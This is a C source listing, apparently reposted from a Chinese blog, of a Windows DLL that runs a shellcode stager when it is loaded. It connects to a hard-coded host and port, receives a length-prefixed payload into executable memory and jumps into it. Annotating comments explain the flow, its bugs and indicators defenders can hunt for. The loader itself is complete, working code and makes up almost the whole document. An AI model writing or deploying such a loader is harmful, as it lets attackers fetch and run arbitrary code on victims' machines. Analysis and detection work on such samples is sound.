  • 远程执行shellcode

    #include "Windows.h"
    #include <WinSock2.h>
    #include <stdio.h>  
     
    #pragma comment(lib,"WS2_32.lib")   
     
    /*
     * Staged network loader: opens a TCP connection to a hard-coded address,
     * reads a 4-byte length prefix, allocates a read/write/execute region of
     * that size, receives the remaining bytes into it and transfers control
     * to the received bytes with inline assembly.
     *
     * Return value: 0 on every early-exit path (WSAStartup, connect or the
     * length recv failing). The remaining path never returns in the normal
     * sense: the __asm block below always executes and jumps away, so the
     * VirtualFree call and the closing brace (which has no return statement)
     * are unreachable.
     *
     * Called from DllMain (DLL_PROCESS_ATTACH), i.e. all of this runs on the
     * loading thread while the loader lock is held.
     *
     * Observable sequence for detection/hunting, taken from the calls below:
     * WSAStartup -> WSASocket -> connect(192.168.127.132:8888) ->
     * VirtualAlloc(PAGE_EXECUTE_READWRITE) -> recv into that region ->
     * indirect jump into it, all from a DLL load.
     */
    int shellcode_execute()
    {
        WSADATA wsData;
            if(WSAStartup(MAKEWORD(2,2),&wsData))
            {
                // NOTE(review): the "\n" escape of this literal is rendered as a
                // literal line break in this listing; the original source
                // presumably had printf("WSAStartp fail.\n").
                printf("WSAStartp fail.
    ");
                return 0;
            } 
     
            // Socket creation result is not checked against INVALID_SOCKET;
            // on failure the value is passed straight to connect() below.
            SOCKET sock = WSASocket(AF_INET,SOCK_STREAM,0,0,0,0);
            SOCKADDR_IN server;
            ZeroMemory(&server,sizeof(SOCKADDR_IN));
            server.sin_family = AF_INET;
            // Hard-coded server address and port: the strongest static
            // indicator in this sample (both literals survive in the binary).
            server.sin_addr.s_addr = inet_addr("192.168.127.132"); //server ip
            server.sin_port = htons(8888); //server port
            if(SOCKET_ERROR == connect(sock,(SOCKADDR*)&server,sizeof(server)))
            {
                // NOTE(review): literal split across a line break in this listing,
                // presumably "connect to server fail.\n" originally.
                printf("connect to server fail.
    ");
                closesocket(sock);
                WSACleanup();
                return 0;
            } 
     
            // Length prefix is read raw from the peer: no byte-order conversion
            // and no upper bound, so the remote side fully controls the size
            // handed to VirtualAlloc below.
            u_int payloadLen;
            if (recv(sock,(char*)&payloadLen,sizeof(payloadLen),0) != sizeof(payloadLen))
            {
                // NOTE(review): literal split across a line break in this listing,
                // presumably "recv error\n" originally.
                printf("recv error
    ");
                closesocket(sock);
                WSACleanup();
                return 0;
            } 
     
            // Private RWX allocation of attacker-chosen size; the return value
            // is not checked, so a failed allocation leaves orig_buffer NULL and
            // the jump below still happens. RWX private regions that are then
            // filled from a socket are a classic memory-scanner / EDR trigger.
            char* orig_buffer = (char*)VirtualAlloc(NULL,payloadLen,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
            char* buffer = orig_buffer;
            int ret = 0;
            // Receive loop: advances buffer and decrements the remaining count
            // by whatever recv returned. On SOCKET_ERROR (-1) buffer moves back
            // one byte and the unsigned payloadLen wraps; the loop then exits
            // because ret > 0 is false. Nothing afterwards verifies that
            // payloadLen reached 0, so a short or failed transfer still falls
            // through to the jump with a partially filled buffer.
            do
            {
                ret = recv(sock,buffer,payloadLen,0);
                buffer += ret;
                payloadLen -= ret;
            } while (ret > 0 && payloadLen > 0);  
     
         // execute the shellcode
            // MSVC x86 inline assembly (32-bit builds only). The socket handle
            // is placed in edi before the jump, which matches the hand-off
            // convention staged reverse-TCP payloads use to reuse the existing
            // connection. `jmp orig_buffer` with a local variable operand is
            // presumably assembled as an indirect jump through the variable's
            // value (i.e. into the received bytes) -- confirm against the
            // compiled binary. Control does not come back to this function.
            __asm
            {
                mov edi,sock;   
                jmp orig_buffer; 
            } 
     
            // Unreachable: the __asm block above never returns here. Note also
            // that the socket is never closed and WSACleanup is never called on
            // this path.
            VirtualFree(orig_buffer,0,MEM_RELEASE);   
     
     
    }   
     
    /*
     * DLL entry point. On DLL_PROCESS_ATTACH it runs shellcode_execute()
     * synchronously on the loading thread, so the whole network/alloc/jump
     * sequence happens while the loader lock is held (Winsock calls from
     * DllMain are explicitly unsupported by Windows, which is another reason
     * this pattern stands out). Because shellcode_execute() does not return
     * once it jumps into the received buffer, DllMain never reaches
     * `return TRUE` on that path and the LoadLibrary call that triggered it
     * never completes in the loading thread.
     *
     * hModule and lpReserved are unused. The fall-through from
     * DLL_PROCESS_ATTACH into the following case labels only reaches the
     * shared break, so it has no additional effect.
     */
    BOOL APIENTRY DllMain( HMODULE hModule,
                          DWORD  ul_reason_for_call,
                          LPVOID lpReserved
                          )
    {
        switch (ul_reason_for_call)
        {
        case DLL_PROCESS_ATTACH:
            shellcode_execute();
            /* fallthrough (to the shared break) */
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
        }
        return TRUE;
    }
  • 原文地址:https://www.cnblogs.com/zheh/p/5579719.html